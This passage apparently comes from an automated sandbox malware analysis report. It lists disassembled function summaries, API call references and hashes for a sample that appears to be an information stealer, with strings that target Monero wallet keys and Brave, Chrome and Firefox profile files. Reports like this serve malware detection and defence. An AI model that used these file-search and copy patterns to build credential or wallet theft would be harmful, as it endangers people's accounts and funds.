                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Process$AllocateName$ComputerExitUser
                                • String ID:
                                • API String ID: 3550813701-0
                                • Opcode ID: 0e0f5a116930367f754f5aa5e12448f73e73587bb73fdde90d1908d56cc693bc
                                • Instruction ID: 6714c892f37c5318c3fd1beaa6b26343532c1a0627e89f3d8b937a5799d27840
                                • Opcode Fuzzy Hash: 0e0f5a116930367f754f5aa5e12448f73e73587bb73fdde90d1908d56cc693bc
                                • Instruction Fuzzy Hash: CAE0ECB696420552DE0073B0BC0EFAA329C6B15349F044425BA09D2203FE25E80196AA
                                APIs
                                • wsprintfA.USER32 ref: 000938CC
                                • FindFirstFileA.KERNEL32(?,?), ref: 000938E3
                                • lstrcat.KERNEL32(?,?), ref: 00093935
                                • StrCmpCA.SHLWAPI(?,000A0F70), ref: 00093947
                                • StrCmpCA.SHLWAPI(?,000A0F74), ref: 0009395D
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00093C67
                                • FindClose.KERNEL32(000000FF), ref: 00093C7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                                • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                                • API String ID: 1125553467-2524465048
                                • Opcode ID: c1fa08334285ac62e297faf4e98e9c1fd797fe1c28827dbc4cb3e2c51c29f3d5
                                • Instruction ID: 6b8b351409bf9321cee3fcb139284c14329804460de1aff4aca52e2363f27117
                                • Opcode Fuzzy Hash: c1fa08334285ac62e297faf4e98e9c1fd797fe1c28827dbc4cb3e2c51c29f3d5
                                • Instruction Fuzzy Hash: 8DA13EB1A0021C9BDF24DBA4DC89FEE73B9BF49304F044598B64D96141EB759B84CFA2
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                • FindFirstFileA.KERNEL32(00000000,?,000A0B32,000A0B2B,00000000,?,?,?,000A13F4,000A0B2A), ref: 0008BEF5
                                • StrCmpCA.SHLWAPI(?,000A13F8), ref: 0008BF4D
                                • StrCmpCA.SHLWAPI(?,000A13FC), ref: 0008BF63
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0008C7BF
                                • FindClose.KERNEL32(000000FF), ref: 0008C7D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                • API String ID: 3334442632-726946144
                                • Opcode ID: a17d1c421f1a9e76dc878f80d408e4a2a4655da024be185a70879c6ffe955240
                                • Instruction ID: 9fc96193a4b98e883a33197d564350c3ef2476bb4b703228bb949bc5950da0dd
                                • Opcode Fuzzy Hash: a17d1c421f1a9e76dc878f80d408e4a2a4655da024be185a70879c6ffe955240
                                • Instruction Fuzzy Hash: A5425172A10108ABDF14FBB0DD96EEE737DAF45300F404558B90A96192EF349B49DBE2
                                APIs
                                • wsprintfA.USER32 ref: 0009492C
                                • FindFirstFileA.KERNEL32(?,?), ref: 00094943
                                • StrCmpCA.SHLWAPI(?,000A0FDC), ref: 00094971
                                • StrCmpCA.SHLWAPI(?,000A0FE0), ref: 00094987
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00094B7D
                                • FindClose.KERNEL32(000000FF), ref: 00094B92
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s$%s\%s$%s\*
                                • API String ID: 180737720-445461498
                                • Opcode ID: 1c53e8fcda11bdd429df30ce2640c2524bebf9b8395d8f60b7d2944f64576414
                                • Instruction ID: 06d51822cb6b53465f5aed4d2a406f584295bb902355df0c62769b0c78fc268d
                                • Opcode Fuzzy Hash: 1c53e8fcda11bdd429df30ce2640c2524bebf9b8395d8f60b7d2944f64576414
                                • Instruction Fuzzy Hash: 656136B190021CABCF24EBA0EC49FEA73BCBB49705F048698F64996141EB75DB45CF91
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00094580
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00094587
                                • wsprintfA.USER32 ref: 000945A6
                                • FindFirstFileA.KERNEL32(?,?), ref: 000945BD
                                • StrCmpCA.SHLWAPI(?,000A0FC4), ref: 000945EB
                                • StrCmpCA.SHLWAPI(?,000A0FC8), ref: 00094601
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0009468B
                                • FindClose.KERNEL32(000000FF), ref: 000946A0
                                • lstrcat.KERNEL32(?,00D0F348), ref: 000946C5
                                • lstrcat.KERNEL32(?,00D0DFC8), ref: 000946D8
                                • lstrlen.KERNEL32(?), ref: 000946E5
                                • lstrlen.KERNEL32(?), ref: 000946F6
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                • String ID: %s\%s$%s\*
                                • API String ID: 671575355-2848263008
                                • Opcode ID: a11ce234c09430b4d1a744189129c460237a473bd51d625fde2416f847a0941a
                                • Instruction ID: 236c7cb73e8e8414d04ecd1eab507886a7db401ed5eba9bde5cbf111871371ac
                                • Opcode Fuzzy Hash: a11ce234c09430b4d1a744189129c460237a473bd51d625fde2416f847a0941a
                                • Instruction Fuzzy Hash: 555153B194021C9BCB60EBB0EC89FED737CBB58304F404598F64996191EB759B858F92
                                APIs
                                • wsprintfA.USER32 ref: 00093EC3
                                • FindFirstFileA.KERNEL32(?,?), ref: 00093EDA
                                • StrCmpCA.SHLWAPI(?,000A0FAC), ref: 00093F08
                                • StrCmpCA.SHLWAPI(?,000A0FB0), ref: 00093F1E
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0009406C
                                • FindClose.KERNEL32(000000FF), ref: 00094081
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 180737720-4073750446
                                • Opcode ID: 9f0d0db778eac9e3ba04acc3d0aee3cf8ccd9e56ff1481169b0c828ba58dbceb
                                • Instruction ID: 024379edb624e2249a6fb273a68818aa239a949ba7fc5f15b34161cf8a36e278
                                • Opcode Fuzzy Hash: 9f0d0db778eac9e3ba04acc3d0aee3cf8ccd9e56ff1481169b0c828ba58dbceb
                                • Instruction Fuzzy Hash: DA5145B290021CABCF24FBB0DC89EEA737CBB48304F448598F65996141DB759B89DF91
                                APIs
                                • wsprintfA.USER32 ref: 0008ED3E
                                • FindFirstFileA.KERNEL32(?,?), ref: 0008ED55
                                • StrCmpCA.SHLWAPI(?,000A1538), ref: 0008EDAB
                                • StrCmpCA.SHLWAPI(?,000A153C), ref: 0008EDC1
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0008F2AE
                                • FindClose.KERNEL32(000000FF), ref: 0008F2C3
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 180737720-1013718255
                                • Opcode ID: 2790134075c3cb5cfecde7754bea0c230976e482b140a22285a1fb1cd371cd2f
                                • Instruction ID: e47a9560e908060eee7d60334693630180b6ab3e19a9b81e108ebefa5adf73b7
                                • Opcode Fuzzy Hash: 2790134075c3cb5cfecde7754bea0c230976e482b140a22285a1fb1cd371cd2f
                                • Instruction Fuzzy Hash: D4E1BF72A111189ADF54FB60DC56EEE7378AF55300F4041A9B50A66093EF306F8ADFA2
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000A15B8,000A0D96), ref: 0008F71E
                                • StrCmpCA.SHLWAPI(?,000A15BC), ref: 0008F76F
                                • StrCmpCA.SHLWAPI(?,000A15C0), ref: 0008F785
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0008FAB1
                                • FindClose.KERNEL32(000000FF), ref: 0008FAC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                • String ID: prefs.js
                                • API String ID: 3334442632-3783873740
                                • Opcode ID: 27f4b312e8c3a04feb544f72ef8df6af29fdfcc9b5510505a1ab0b2f409fd250
                                • Instruction ID: 7a4cb63954ac0fd97b0ae3ce13ad8a996de632e33909f512e23be2b31ee8c147
                                • Opcode Fuzzy Hash: 27f4b312e8c3a04feb544f72ef8df6af29fdfcc9b5510505a1ab0b2f409fd250
                                • Instruction Fuzzy Hash: 0EB14F71A101189BDF24FF70DC96EEE7379BF55300F4081A8A54A9A192EF306B49DBD2
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000A510C,?,?,?,000A51B4,?,?,00000000,?,00000000), ref: 00081923
                                • StrCmpCA.SHLWAPI(?,000A525C), ref: 00081973
                                • StrCmpCA.SHLWAPI(?,000A5304), ref: 00081989
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00081D40
                                • DeleteFileA.KERNEL32(00000000), ref: 00081DCA
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00081E20
                                • FindClose.KERNEL32(000000FF), ref: 00081E32
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                • String ID: \*.*
                                • API String ID: 1415058207-1173974218
                                • Opcode ID: c0e1d9ca4e857002bf6259f725d7bec2bbafe2a22c112666ee493b98418ecc4d
                                • Instruction ID: 5292498df5bd8c66e5c56bb3b65f96054af7b6da1a6716a04c4fba5dfbad6f2b
                                • Opcode Fuzzy Hash: c0e1d9ca4e857002bf6259f725d7bec2bbafe2a22c112666ee493b98418ecc4d
                                • Instruction Fuzzy Hash: C312CD71A10118ABDF15FB60DC96EEE7378BF55300F404199A50A66092EF706F89DFE2
                                APIs
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,000A0C2E), ref: 0008DE5E
                                • StrCmpCA.SHLWAPI(?,000A14C8), ref: 0008DEAE
                                • StrCmpCA.SHLWAPI(?,000A14CC), ref: 0008DEC4
                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0008E3E0
                                • FindClose.KERNEL32(000000FF), ref: 0008E3F2
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                • String ID: \*.*
                                • API String ID: 2325840235-1173974218
                                • Opcode ID: f3a0de8a7192376be8c2d57a21fcf6d5a837e6d24efa5755a30c7d7a6efabc1f
                                • Instruction ID: 68ac8c5287533fb878b18d4ab7af8448c13f6efb219644ed3835148c7220d62f
